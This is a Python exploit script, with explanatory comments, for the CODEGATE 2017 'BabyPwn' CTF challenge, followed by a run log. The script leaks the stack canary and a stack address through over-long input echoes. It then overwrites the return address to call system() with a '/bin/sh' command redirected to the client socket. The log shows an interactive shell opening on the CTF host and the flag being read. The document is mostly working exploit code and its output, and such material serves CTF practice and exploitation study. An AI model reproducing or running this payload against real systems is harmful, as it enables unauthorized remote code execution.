CODEGATE2017 prequals - BabyPwn
from No___Op import *
# Exploit for CODEGATE 2017 prequals - "BabyPwn" (32-bit stack overflow with a
# stack canary). As the code below shows, the attack is three round trips:
#   1. leak the canary through the echo of an over-long input,
#   2. leak a stack pointer the same way and derive the buffer address,
#   3. overwrite the return address with system@plt, pointing its argument at a
#      command string carried in the same payload.
# All transport helpers (Pwning, read_until/recv/sendall, u32/p32, succ, shell)
# come from the author's private No___Op library; `sys` and `time` are also
# re-exported by that star import.
# Only use against hosts you are authorized to test; the remote address below
# was the 2017 CTF infrastructure.

# Any extra command-line argument selects the remote CTF target, otherwise a
# local copy of the challenge is expected on port 8181.
if len(sys.argv) > 1:
    target = '110.10.212.130:8889'
else:
    target = 'localhost:8181'
c = Pwning( target )

# system@plt of the challenge binary. Being hard-coded, this assumes the binary
# is loaded at a fixed address (no PIE).
plt_system = 0x08048620 #+ 0x10

# --- Leak 1: stack canary -------------------------------------------------
# Menu option 1, then exactly 0x28 (40) bytes of filler so that the bytes echoed
# back after the filler are the canary. glibc zeroes the low byte of the canary,
# so only the upper 3 bytes are recovered and the 0x00 is re-inserted by hand
# (little-endian, hence it is prepended before u32()).
c.sendall('1')
time.sleep(1)   # crude synchronisation; the prompt is never actually read
c.sendall('a' * 0x28)
# NOTE(review): 28 here is decimal (28 'a's) whereas the filler above is 0x28
# (40). It evidently worked (see the run log), but confirm this matches the
# binary's echo format rather than being a typo.
c.read_until('a' * 28 + '\n')
# NOTE(review): recv(3)/recv(4) are assumed to return exactly that many bytes;
# if Pwning.recv is a thin socket recv(), a short read would corrupt the leak.
canary = u32('\x00' + c.recv(3))
succ('canary: ' + hex(canary))

# --- Leak 2: stack address -------------------------------------------------
# Overwrite 0x28 filler + 4 (canary slot) + 4 + 3 bytes, then read the 4 bytes
# that follow as a stack pointer. The author's "# buffer" comment records that
# this pointer lies 0x174 bytes above the start of the vulnerable buffer.
c.sendall('1')
time.sleep(1)
c.sendall('a' * (0x28 + 4 + 4 + 3))
c.read_until('a' * (0x28 + 4 + 4 + 3) + '\n')
addr_stack = u32(c.recv(4)) - 0x174 # buffer
succ('stack_addr: ' + hex(addr_stack))

# --- Final payload -----------------------------------------------------------
# Layout (offsets in bytes from the start of the buffer):
#   [0x00,0x28)  filler
#   [0x28,0x2c)  leaked canary, so the stack-protector check passes
#   [0x2c,0x38)  12 bytes of filler (saved registers / saved ebp region - inferred)
#   [0x38,0x3c)  return address -> system@plt
#   [0x3c,0x40)  'gomi' (Japanese for garbage): fake return address for system()
#   [0x40,0x44)  system()'s argument: pointer to the command string that
#                immediately follows (addr_stack + 64 + 4 = 0x44)
#   [0x44,...)   the command; stdin/stdout/stderr are redirected to fd 4, which
#                is presumably the accepted client socket, so the shell talks
#                back over the connection
#   pad to 0x64  presumably the maximum the binary reads - TODO confirm
payload = ''
payload += 'a' * (40 - len(payload))
payload += p32(canary)
payload += 'a' * 12
payload += p32(plt_system)
payload += 'gomi'
# len(payload) is 64 here; +4 skips over this pointer itself.
payload += p32(addr_stack + len(payload) + 4)
payload += '/bin/sh <&4 >&4 2>&4;'
payload += 'c' * (0x64 - len(payload))
c.sendall('1')
time.sleep(0.5)
c.sendall(payload)
time.sleep(0.5)
# Option 3 presumably leaves the menu loop so the function returns into the
# corrupted frame and system("/bin/sh ...") runs.
c.sendall('3')
c.shell()   # hand the connection over to the user (interactive shell)
$ python exp.py r
[*]Connecting "110.10.212.130:8889"...
[+]Connection success!
[+]canary: 0xcc781900
[+]stack_addr: 0xffca6f34
*** 4ll y0u n33d i5 5HELL! ***
Time Out!
ls
babypwn
flag
cat flag
FLAG{Good_Job~!Y0u_@re_Very__G@@d!!!!!!^.^}
exit
*** Connection closed by remote host ***